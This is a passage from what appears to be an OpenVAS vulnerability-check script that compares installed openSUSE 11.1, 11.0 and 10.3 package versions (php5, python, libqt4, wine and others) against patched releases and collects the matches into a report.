res;\n}\nif ((res = isrpmvuln(pkg:\"powerdevil-lang\", rpm:\"powerdevil-lang~1.4.1~4.5.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ptools\", rpm:\"ptools~0.1~2.16.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.6.0~2.21.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-base\", rpm:\"python-base~2.6.0~2.22.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-curses\", rpm:\"python-curses~2.6.0~2.21.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-demo\", rpm:\"python-demo~2.6.0~2.21.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-devel\", rpm:\"python-devel~2.6.0~2.22.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-gdbm\", rpm:\"python-gdbm~2.6.0~2.21.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-idle\", rpm:\"python-idle~2.6.0~2.21.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-m2crypto\", rpm:\"python-m2crypto~0.17~2.1.4\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-satsolver\", rpm:\"python-satsolver~0.13.2~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-tk\", rpm:\"python-tk~2.6.0~2.21.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-xml\", rpm:\"python-xml~2.6.0~2.22.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-xpcom190\", rpm:\"python-xpcom190~1.9.0.6~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"qt4-x11-tools\", rpm:\"qt4-x11-tools~4.4.3~4.8.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ruby-satsolver\", rpm:\"ruby-satsolver~0.13.2~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"satsolver-tools\", rpm:\"satsolver-tools~0.13.2~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sblim-sfcb\", rpm:\"sblim-sfcb~1.3.2~9.12.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sysvinit\", rpm:\"sysvinit~2.86~186.15.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"tiff\", rpm:\"tiff~3.8.2~133.35.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd\", rpm:\"ulogd~1.24~129.51.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd-mysql\", rpm:\"ulogd-mysql~1.24~129.51.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd-pcap\", rpm:\"ulogd-pcap~1.24~129.51.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd-pgsql\", rpm:\"ulogd-pgsql~1.24~129.51.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd-sqlite\", rpm:\"ulogd-sqlite~1.24~129.51.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"wine\", rpm:\"wine~1.1.9~1.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"wine-devel\", rpm:\"wine-devel~1.1.9~1.11.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2\", rpm:\"yast2~2.17.59~1.2.13\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-devel-doc\", rpm:\"yast2-devel-doc~2.17.59~1.2.13\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-pkg-bindings\", rpm:\"yast2-pkg-bindings~2.17.31~1.2.10\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"zypper\", rpm:\"zypper~1.0.5~2.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"MozillaFirefox\", rpm:\"MozillaFirefox~3.0.6~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"MozillaFirefox-translations\", rpm:\"MozillaFirefox-translations~3.0.6~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"apache2-mod_php5\", rpm:\"apache2-mod_php5~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audacity\", rpm:\"audacity~1.3.4~56.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.6~86.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.6~86.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.6~86.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.6~86.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.6~86.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dovecot\", rpm:\"dovecot~1.0.13~24.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dovecot-devel\", rpm:\"dovecot-devel~1.0.13~24.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-packagekit\", rpm:\"gnome-packagekit~0.2.1~15.7\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun\", rpm:\"java-1_6_0-sun~1.6.0.u12~1.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-alsa\", rpm:\"java-1_6_0-sun-alsa~1.6.0.u12~1.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-demo\", rpm:\"java-1_6_0-sun-demo~1.6.0.u12~1.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-devel\", rpm:\"java-1_6_0-sun-devel~1.6.0.u12~1.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-jdbc\", rpm:\"java-1_6_0-sun-jdbc~1.6.0.u12~1.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-plugin\", rpm:\"java-1_6_0-sun-plugin~1.6.0.u12~1.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-src\", rpm:\"java-1_6_0-sun-src~1.6.0.u12~1.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libQtWebKit-devel\", rpm:\"libQtWebKit-devel~4.4.0~12.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libQtWebKit4\", rpm:\"libQtWebKit4~4.4.0~12.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipulog\", rpm:\"libipulog~1.24~101.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4\", rpm:\"libqt4~4.4.0~12.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-devel\", rpm:\"libqt4-devel~4.4.0~12.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-devel-doc\", rpm:\"libqt4-devel-doc~4.4.0~12.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-qt3support\", rpm:\"libqt4-qt3support~4.4.0~12.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-sql\", rpm:\"libqt4-sql~4.4.0~12.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-sql-mysql\", rpm:\"libqt4-sql-mysql~4.4.0~5.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-sql-postgresql\", rpm:\"libqt4-sql-postgresql~4.4.0~5.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-sql-sqlite\", rpm:\"libqt4-sql-sqlite~4.4.0~12.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-sql-unixODBC\", rpm:\"libqt4-sql-unixODBC~4.4.0~5.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-x11\", rpm:\"libqt4-x11~4.4.0~12.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libsatsolver-devel\", rpm:\"libsatsolver-devel~0.9.6~0.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libsatsolver-perl\", rpm:\"libsatsolver-perl~0.9.6~0.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libsatsolver-ruby\", rpm:\"libsatsolver-ruby~0.9.6~0.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libtiff-devel\", rpm:\"libtiff-devel~3.8.2~108.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libtiff3\", rpm:\"libtiff3~3.8.2~108.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvirt\", rpm:\"libvirt~0.4.0~59.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvirt-devel\", rpm:\"libvirt-devel~0.4.0~59.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvirt-doc\", rpm:\"libvirt-doc~0.4.0~59.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvirt-python\", rpm:\"libvirt-python~0.4.0~59.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.6.32~11.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.6.32~11.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2-doc\", rpm:\"libxml2-doc~2.6.32~11.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libzypp\", rpm:\"libzypp~4.28.1~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libzypp-devel\", rpm:\"libzypp-devel~4.28.1~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.11.2~36.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190\", rpm:\"mozilla-xulrunner190~1.9.0.6~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190-devel\", rpm:\"mozilla-xulrunner190-devel~1.9.0.6~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190-gnomevfs\", rpm:\"mozilla-xulrunner190-gnomevfs~1.9.0.6~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190-translations\", rpm:\"mozilla-xulrunner190-translations~1.9.0.6~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"netatalk\", rpm:\"netatalk~2.0.3~218.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"netatalk-devel\", rpm:\"netatalk-devel~2.0.3~218.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"novell-ipsec-tools\", rpm:\"novell-ipsec-tools~0.6.3~183.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"novell-ipsec-tools-devel\", rpm:\"novell-ipsec-tools-devel~0.6.3~183.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openslp\", rpm:\"openslp~1.2.0~143.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openslp-devel\", rpm:\"openslp-devel~1.2.0~143.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openslp-server\", rpm:\"openslp-server~1.2.0~143.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.10.0~37.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"perl-base\", rpm:\"perl-base~5.10.0~37.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"perl-doc\", rpm:\"perl-doc~5.10.0~37.6\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5\", rpm:\"php5~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bcmath\", rpm:\"php5-bcmath~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bz2\", rpm:\"php5-bz2~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-calendar\", rpm:\"php5-calendar~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ctype\", rpm:\"php5-ctype~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-curl\", rpm:\"php5-curl~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dba\", rpm:\"php5-dba~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dbase\", rpm:\"php5-dbase~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-devel\", rpm:\"php5-devel~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dom\", rpm:\"php5-dom~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-exif\", rpm:\"php5-exif~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-fastcgi\", rpm:\"php5-fastcgi~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ftp\", rpm:\"php5-ftp~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gd\", rpm:\"php5-gd~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gettext\", rpm:\"php5-gettext~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gmp\", rpm:\"php5-gmp~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-hash\", rpm:\"php5-hash~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-iconv\", rpm:\"php5-iconv~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-imap\", rpm:\"php5-imap~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-json\", rpm:\"php5-json~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ldap\", rpm:\"php5-ldap~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mbstring\", rpm:\"php5-mbstring~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mcrypt\", rpm:\"php5-mcrypt~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mysql\", rpm:\"php5-mysql~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ncurses\", rpm:\"php5-ncurses~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-odbc\", rpm:\"php5-odbc~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-openssl\", rpm:\"php5-openssl~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pcntl\", rpm:\"php5-pcntl~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pdo\", rpm:\"php5-pdo~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pear\", rpm:\"php5-pear~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pgsql\", rpm:\"php5-pgsql~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-posix\", rpm:\"php5-posix~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pspell\", rpm:\"php5-pspell~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-readline\", rpm:\"php5-readline~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-shmop\", rpm:\"php5-shmop~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-snmp\", rpm:\"php5-snmp~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-soap\", rpm:\"php5-soap~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sockets\", rpm:\"php5-sockets~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sqlite\", rpm:\"php5-sqlite~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-suhosin\", rpm:\"php5-suhosin~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvmsg\", rpm:\"php5-sysvmsg~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvsem\", rpm:\"php5-sysvsem~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvshm\", rpm:\"php5-sysvshm~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-tidy\", rpm:\"php5-tidy~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-tokenizer\", rpm:\"php5-tokenizer~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-wddx\", rpm:\"php5-wddx~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlreader\", rpm:\"php5-xmlreader~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlrpc\", rpm:\"php5-xmlrpc~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlwriter\", rpm:\"php5-xmlwriter~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xsl\", rpm:\"php5-xsl~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-zip\", rpm:\"php5-zip~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-zlib\", rpm:\"php5-zlib~5.2.6~0.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"qt4-x11-tools\", rpm:\"qt4-x11-tools~4.4.0~12.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"satsolver-tools\", rpm:\"satsolver-tools~0.9.6~0.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sbl\", rpm:\"sbl~3.2.2~16.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sbl-orca\", rpm:\"sbl-orca~3.2.2~16.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sblim-sfcb\", rpm:\"sblim-sfcb~1.3.0~6.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"swfdec\", rpm:\"swfdec~0.6.8~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"swfdec-devel\", rpm:\"swfdec-devel~0.6.8~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"swfdec-doc\", rpm:\"swfdec-doc~0.6.8~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"tiff\", rpm:\"tiff~3.8.2~108.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd\", rpm:\"ulogd~1.24~101.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd-mysql\", rpm:\"ulogd-mysql~1.24~101.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd-pcap\", rpm:\"ulogd-pcap~1.24~101.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd-pgsql\", rpm:\"ulogd-pgsql~1.24~101.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ulogd-sqlite\", rpm:\"ulogd-sqlite~1.24~101.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"virtualbox-ose\", rpm:\"virtualbox-ose~1.5.6~33.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"virtualbox-ose-guest-tools\", rpm:\"virtualbox-ose-guest-tools~1.5.6~33.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"wine\", rpm:\"wine~0.9.64_aka_1.0.rc3~2.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"wine-devel\", rpm:\"wine-devel~0.9.64_aka_1.0.rc3~2.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xine-devel\", rpm:\"xine-devel~1.1.12~8.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xine-extra\", rpm:\"xine-extra~1.1.12~8.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xine-lib\", rpm:\"xine-lib~1.1.12~8.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xorg-x11-driver-virtualbox-ose\", rpm:\"xorg-x11-driver-virtualbox-ose~1.5.6~33.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-gtk\", rpm:\"yast2-gtk~2.16.15~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-ncurses-pkg\", rpm:\"yast2-ncurses-pkg~2.16.14~0.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-packager\", rpm:\"yast2-packager~2.16.53~3.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-pkg-bindings\", rpm:\"yast2-pkg-bindings~2.16.42~0.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-qt-pkg\", rpm:\"yast2-qt-pkg~2.16.48~0.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"apache2-mod_php5\", rpm:\"apache2-mod_php5~5.2.6~0.8\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audacity\", rpm:\"audacity~1.3.3~46.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp\", 